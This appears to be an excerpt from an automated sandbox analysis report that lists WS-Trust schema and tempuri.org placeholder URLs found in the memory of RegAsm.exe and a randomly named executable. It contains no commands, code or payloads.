Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
Source: RegAsm.exe, 00000009.00000002.2875623535.000000000338C000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002953000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/
Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/D
Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id1
Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id10
Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id10Response
Source: RegAsm.exe, 00000009.00000002.2875623535.000000000338C000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000003095000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id10ResponseD
Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id11
Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id11Response
Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003567000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002EC4000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000029F3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id11ResponseD
Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id12
Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id12Response
Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000003174000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000029F3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id12ResponseD
Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.00000000030D9000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id13
Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000029F3000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id13Response
Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.00000000030D9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000029F3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id13ResponseD
Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id14
Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id14Response
Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000003095000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000029F3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id14ResponseD
Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id15
Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id15Response
Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002F1B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002953000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id15ResponseD
Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id16
Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id16Response
Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002F1B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002953000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id16ResponseD
Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id17
Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id17Response
Source: RegAsm.exe, 00000009.00000002.2875623535.000000000338C000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000003095000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id17ResponseD
Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id18
Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id18Response
Source: RegAsm.exe, 00000009.00000002.2875623535.000000000338C000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000003095000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id18ResponseD
Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2875623535.0000000003384000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id19
Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id19Response
Source: RegAsm.exe, 00000009.00000002.2875623535.000000000338C000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000003095000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id19ResponseD
Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id1Response
Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id1ResponseD
Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id2
Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id20
Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000003179000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000030B6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id20Response
Source: RegAsm.exe, 00000009.00000002.2875623535.00000000033F4000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000003179000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000030B6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id20ResponseD
Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id21
Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id21Response
Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id21ResponseD
Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id22
Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id22Response
Source: RegAsm.exe, 00000009.00000002.2875623535.00000000033F4000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000003179000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000030B6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id22ResponseD
Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.000000000316C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000030B6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id23
Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2875623535.000000000338C000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id23Response
Source: RegAsm.exe, 00000009.00000002.2875623535.00000000033F4000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000003179000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000030B6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id23ResponseD
